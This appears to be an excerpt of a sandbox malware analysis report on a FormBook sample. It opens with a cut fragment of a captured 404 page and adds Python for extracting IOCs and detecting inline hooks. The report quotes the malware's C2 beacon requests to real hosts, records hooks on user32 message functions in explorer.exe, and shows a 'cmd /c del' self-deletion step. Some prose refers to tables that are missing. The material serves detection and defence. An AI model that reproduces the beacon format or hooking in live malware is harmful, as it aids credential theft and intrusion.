                                                    Data Ascii: 111157<!DOCTYPE html><html> <head> <meta http-equiv="Content-type" content="text/html; charset=utf-8"> <meta http-equiv="Cache-control" content="no-cache"> <meta http-equiv="Pragma" content="no-cache"> <meta http-equiv="Expires" content="0"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <title>34041 9Not Found1fca</title> <style type="text/css"> body { font-family: Arial, Helvetica, sans-serif; font-size: 14px; line-height: 1.428571429; background-color: #ffffff; color: #2F3230; padding: 0; margin: 0; } section, footer { display: block; padding: 0; margin: 0; } .container { margin-left: auto; margin-right: auto; padding: 0 10px; } .response-info { color: #CCCCCC; } .status-code { font-size: 500%; } .status-reason { font-size: 250%; display: block; } .conta
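The four HTTP sessions above share one shape: each GET comes from explorer.exe, has no User-Agent, closes the connection after a single request, uses the path /glt/, and carries the same SP value (cnxhAdAh) while the long V4 value differs per host; the DNS answers show that every destination IP is an A record reached through the CNAME chain of the name that was queried moments earlier. The Python below is an added example for this report, not Joe Sandbox code: it parses those captured requests and answers and extracts the facts a detection engineer would turn into IOCs. The DNS answers and request lines are copied from the tables above; the feature names, the 40-character base64 threshold, the CNAME-loop guard and the "value shared across all sessions" heuristic are my own choices. One pitfall it works around: the malware sends raw base64 with unencoded `+` and `/`, so `urllib.parse.parse_qs` would turn every `+` into a space and corrupt the value, hence the hand-rolled query split.

```python
"""Network IOC extraction for the FormBook capture in this report.

Added example, not part of the Joe Sandbox output. The DNS answers and the
four HTTP requests are copied from the tables above; the feature names and
the shared-token heuristic are mine."""
import re
from urllib.parse import urlsplit

# Copied from the "DNS Answers" table: (owner name, record type, value).
DNS_ANSWERS = [
    ("www.tessuto.net", "CNAME", "prod-sav-park-lb01-1919960993.us-east-2.elb.amazonaws.com"),
    ("prod-sav-park-lb01-1919960993.us-east-2.elb.amazonaws.com", "A", "3.138.72.189"),
    ("prod-sav-park-lb01-1919960993.us-east-2.elb.amazonaws.com", "A", "3.12.202.18"),
    ("prod-sav-park-lb01-1919960993.us-east-2.elb.amazonaws.com", "A", "3.134.22.63"),
    ("www.reem.pro", "CNAME", "reem.pro"),
    ("reem.pro", "A", "34.102.136.180"),
    ("www.themaskedstitcher.com", "CNAME", "ext-cust.squarespace.com"),
    ("ext-cust.squarespace.com", "A", "198.49.23.141"),
    ("ext-cust.squarespace.com", "A", "198.185.159.141"),
    ("www.auctionpros.club", "CNAME", "auctionpros.club"),
    ("auctionpros.club", "A", "162.0.232.118"),
]

# Copied from the "HTTP Packets" section: (destination IP, raw request).
# The seven 0x00 bytes are the "Data Raw" the report shows after each GET.
NUL7 = "\x00" * 7
HTTP_SESSIONS = [
    ("3.138.72.189",
     "GET /glt/?SP=cnxhAdAh&V4=RXCBf+kTtqMKofvvq54zDDgrcqehmcxCBUCamp/3E7fzZOB7U/XBgSeZZ5TRQ//94zw4 HTTP/1.1\r\n"
     "Host: www.tessuto.net\r\nConnection: close\r\n\r\n" + NUL7),
    ("34.102.136.180",
     "GET /glt/?V4=MLpAZ0AK/spUlt1gTLvrDwTqfxMoBLVQzrzuTOkSqlsdFHJLAwBY2ZzU1xSBGMRzyeG8&SP=cnxhAdAh HTTP/1.1\r\n"
     "Host: www.reem.pro\r\nConnection: close\r\n\r\n" + NUL7),
    ("198.49.23.141",
     "GET /glt/?SP=cnxhAdAh&V4=oeIisVoovR5GVMPXvvkWG2hSa0zFuUbByopAkVC9hBB+Ndji49czoVDBLaeM7MDZ9TnP HTTP/1.1\r\n"
     "Host: www.themaskedstitcher.com\r\nConnection: close\r\n\r\n" + NUL7),
    ("162.0.232.118",
     "GET /glt/?V4=hWCSv9Zrwql4NKRqpOYz8tuCeFQ4j+1tRbbWxD4HfruMRkMSYBHm3MJuhB2jB30ChDel&SP=cnxhAdAh HTTP/1.1\r\n"
     "Host: www.auctionpros.club\r\nConnection: close\r\n\r\n" + NUL7),
]

# Raw base64 alphabet, 40+ chars. The malware does not URL-encode '+' or '/',
# so urllib.parse.parse_qs would turn '+' into a space; the query is split by hand.
BASE64ISH = re.compile(r"^[A-Za-z0-9+/]{40,}={0,2}$")


def resolve(name, answers, depth=0):
    """Follow CNAME chains in the captured answers down to the A records."""
    ips = set()
    if depth > 8:  # a CNAME loop in hostile DNS must not recurse forever
        return ips
    for owner, rtype, value in answers:
        if owner.lower() != name.lower():
            continue
        if rtype == "A":
            ips.add(value)
        elif rtype == "CNAME":
            ips |= resolve(value, answers, depth + 1)
    return ips


def parse_request(raw):
    """Split a raw HTTP/1.1 request into method, path, query, headers and body."""
    head, _, body = raw.partition("\r\n\r\n")
    lines = head.split("\r\n")
    method, target, _version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    parts = urlsplit(target)
    query = {}
    for pair in filter(None, parts.query.split("&")):
        key, _, value = pair.partition("=")
        query[key] = value
    return {"method": method, "path": parts.path, "query": query,
            "headers": headers, "body": body}


def session_features(dest_ip, raw, answers):
    """Per-session facts worth turning into detections or IOCs."""
    req = parse_request(raw)
    host = req["headers"].get("host", "")
    return {
        "host": host,
        "dest_ip": dest_ip,
        "ip_matches_dns": dest_ip in resolve(host, answers),
        "path": req["path"],
        "no_user_agent": "user-agent" not in req["headers"],
        "connection_close": req["headers"].get("connection", "").lower() == "close",
        "nul_padding": req["body"] == NUL7,
        "base64ish_params": sorted(k for k, v in req["query"].items() if BASE64ISH.match(v)),
        "query": req["query"],
    }


def shared_query_values(features):
    """Query parameters whose value is identical in every session (the pivotable token)."""
    common = dict(features[0]["query"])
    for f in features[1:]:
        common = {k: v for k, v in common.items() if f["query"].get(k) == v}
    return common


def analyze(sessions=HTTP_SESSIONS, answers=DNS_ANSWERS):
    return [session_features(ip, raw, answers) for ip, raw in sessions]
```

Running `analyze()` over the four sessions reports every destination IP as consistent with the preceding DNS answer, flags the missing User-Agent, `Connection: close` and seven-byte null padding on each request, and `shared_query_values` returns only `{"SP": "cnxhAdAh"}`: the short token is the value worth pivoting on, while the 68-character V4 value changes on every request and is useless as a static indicator. The same per-request shape holds for all four hosts even though three of them answered 404/403/400, which is why the hosts themselves should be treated as a decoy list rather than as confirmed C2.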


                                                    Code Manipulations

                                                    User Modules

                                                    Hook Summary

Function Name | Hook Type | Active in Processes
PeekMessageA | INLINE | explorer.exe
PeekMessageW | INLINE | explorer.exe
GetMessageW | INLINE | explorer.exe
GetMessageA | INLINE | explorer.exe

                                                    Processes

                                                    Process: explorer.exe, Module: user32.dll
Function Name | Hook Type | New Data
PeekMessageA | INLINE | 0x48 0x8B 0xB8 0x86 0x6E 0xE5
PeekMessageW | INLINE | 0x48 0x8B 0xB8 0x8E 0xEE 0xE5
GetMessageW | INLINE | 0x48 0x8B 0xB8 0x8E 0xEE 0xE5
GetMessageA | INLINE | 0x48 0x8B 0xB8 0x86 0x6E 0xE5
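The table above records that the first bytes of four user32.dll message-loop functions in explorer.exe were rewritten. To triage such a finding on a live host, the prologue bytes in memory are compared with a clean copy (read from the module's image on disk at the export's RVA, or from a process known to be clean) and the overwritten stub is decoded to find where control is redirected. The Python below is an added example and not Joe Sandbox code: the clean prologue and the two hooked variants are constructed for illustration, and only `REPORTED_NEW_DATA` is taken from the table above; the set of trampoline encodings it recognises is the usual x64 repertoire (jmp rel32, jmp [rip+disp32], mov rax,imm64 followed by jmp rax or push rax; ret, and push imm32; ret).

```python
"""Inline-hook triage for prologue changes like the ones listed for explorer.exe.

Added example, not Joe Sandbox code. CLEAN_PROLOGUE and the two hooked variants
are constructed; REPORTED_NEW_DATA is copied from the hook table above. On a real
host the clean bytes come from the module on disk (or a known-clean process)."""
import struct

MASK64 = (1 << 64) - 1

# Constructed: a typical x64 prologue (mov [rsp+8],rbx; push rdi; sub rsp,0x20).
CLEAN_PROLOGUE = bytes.fromhex("48895c2408574883ec20")

# Copied from the "New Data" column for explorer.exe / user32.dll.
REPORTED_NEW_DATA = {
    "PeekMessageA": bytes.fromhex("488bb8866ee5"),
    "PeekMessageW": bytes.fromhex("488bb88eeee5"),
    "GetMessageW": bytes.fromhex("488bb88eeee5"),
    "GetMessageA": bytes.fromhex("488bb8866ee5"),
}


def classify_stub(code, addr):
    """Return (kind, target) if `code` begins with a common x64 hook trampoline.

    `addr` is the virtual address the bytes live at; RIP-relative forms need it."""
    if len(code) >= 5 and code[0] == 0xE9:                      # jmp rel32
        rel = struct.unpack_from("<i", code, 1)[0]
        return ("jmp rel32", (addr + 5 + rel) & MASK64)
    if len(code) >= 6 and code[:2] == b"\xff\x25":              # jmp [rip+disp32]
        disp = struct.unpack_from("<i", code, 2)[0]
        return ("jmp [rip+disp32]", (addr + 6 + disp) & MASK64)  # address of the pointer slot
    if len(code) >= 12 and code[:2] == b"\x48\xb8":             # mov rax, imm64 ...
        imm = struct.unpack_from("<Q", code, 2)[0]
        if code[10:12] == b"\xff\xe0":                          # ... jmp rax
            return ("mov rax,imm64; jmp rax", imm)
        if code[10:12] == b"\x50\xc3":                          # ... push rax; ret
            return ("mov rax,imm64; push rax; ret", imm)
    if len(code) >= 6 and code[0] == 0x68 and code[5] == 0xC3:  # push imm32; ret
        return ("push imm32; ret", struct.unpack_from("<I", code, 1)[0])
    return None


def check_prologue(name, addr, live, clean):
    """Diff live prologue bytes against the clean copy and name the hook if recognised."""
    n = min(len(live), len(clean))
    if live[:n] == clean[:n]:
        return {"function": name, "hooked": False}
    first = next(i for i in range(n) if live[i] != clean[i])
    stub = classify_stub(live, addr)
    return {"function": name, "hooked": True, "first_changed_byte": first,
            "kind": stub[0] if stub else "unrecognised",
            "target": stub[1] if stub else None}


# Constructed hooked variants, written the way a hooking engine writes them.
def jmp_rel32_hook(addr, target):
    """Overwrite the first 5 bytes with a near jump to `target`; rest of prologue intact."""
    return b"\xe9" + struct.pack("<i", target - (addr + 5)) + CLEAN_PROLOGUE[5:]


def mov_rax_jmp_hook(target):
    """12-byte absolute trampoline: mov rax, target; jmp rax."""
    return b"\x48\xb8" + struct.pack("<Q", target) + b"\xff\xe0"
```

Run against the constructed variants, `check_prologue` recovers the hook kind and the absolute target from the relative or immediate operand. Run against the six reported bytes, `classify_stub` returns `None`: none of the common trampolines is visible in that prefix, so the report's New Data column on its own does not tell you where PeekMessage/GetMessage now go. You need the clean bytes for the diff and more of the live function (and a disassembler) to follow the redirection; a hook placed a few instructions into the function instead of at the entry would also escape a prologue-only comparison.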

                                                    Statistics

                                                    Behavior


                                                    System Behavior

                                                    General

Start time: 20:04:28
Start date: 20/11/2020
Path: C:\Users\user\Desktop\vOKMFxiCYt.exe
Wow64 process (32bit): true
Commandline: 'C:\Users\user\Desktop\vOKMFxiCYt.exe'
Imagebase: 0x620000
File size: 711168 bytes
MD5 hash: BB30A5DD4130B071FB4CA5F005371C63
Has elevated privileges: true
Has administrator privileges: true
Programmed in: .Net C# or VB.NET
Yara matches:
                                                    • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000000.00000002.241947943.0000000002B43000.00000004.00000001.sdmp, Author: Joe Security
                                                    • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000000.00000002.241858795.0000000002AC1000.00000004.00000001.sdmp, Author: Joe Security
                                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.242174585.0000000003AC9000.00000004.00000001.sdmp, Author: Joe Security
                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.242174585.0000000003AC9000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.242174585.0000000003AC9000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
Reputation: low

                                                    General

Start time: 20:04:30
Start date: 20/11/2020
Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
Wow64 process (32bit): true
Commandline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
Imagebase: 0xce0000
File size: 45152 bytes
MD5 hash: 2867A3817C9245F7CF518524DFD18F28
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
                                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000002.272036979.00000000015B0000.00000040.00000001.sdmp, Author: Joe Security
                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000002.272036979.00000000015B0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000002.272036979.00000000015B0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000002.271729564.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000002.271729564.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000002.271729564.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000002.272011723.0000000001580000.00000040.00000001.sdmp, Author: Joe Security
                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000002.272011723.0000000001580000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000002.272011723.0000000001580000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
Reputation: moderate

                                                    General

Start time: 20:04:32
Start date: 20/11/2020
Path: C:\Windows\explorer.exe
Wow64 process (32bit): false
Commandline:
Imagebase: 0x7ff714890000
File size: 3933184 bytes
MD5 hash: AD5296B280E8F522A8A897C96BAB0E1D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high

                                                    General

Start time: 20:04:42
Start date: 20/11/2020
Path: C:\Windows\SysWOW64\raserver.exe
Wow64 process (32bit): true
Commandline: C:\Windows\SysWOW64\raserver.exe
Imagebase: 0x1170000
File size: 108544 bytes
MD5 hash: 2AADF65E395BFBD0D9B71D7279C8B5EC
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
                                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000002.504019492.0000000001140000.00000040.00000001.sdmp, Author: Joe Security
                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000002.504019492.0000000001140000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000002.504019492.0000000001140000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000002.503167127.0000000000E00000.00000040.00000001.sdmp, Author: Joe Security
                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000002.503167127.0000000000E00000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000002.503167127.0000000000E00000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000002.505106609.0000000004AF0000.00000004.00000001.sdmp, Author: Joe Security
                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000002.505106609.0000000004AF0000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000002.505106609.0000000004AF0000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                    Reputation:moderate

                                                    General

                                                    Start time:20:04:46
                                                    Start date:20/11/2020
                                                    Path:C:\Windows\SysWOW64\cmd.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:/c del 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe'
                                                    Imagebase:0xbd0000
                                                    File size:232960 bytes
                                                    MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Reputation:high

                                                    General

                                                    Start time:20:04:46
                                                    Start date:20/11/2020
                                                    Path:C:\Windows\System32\conhost.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                    Imagebase:0x7ff6b2800000
                                                    File size:625664 bytes
                                                    MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Reputation:high

                                                    Disassembly

                                                    Code Analysis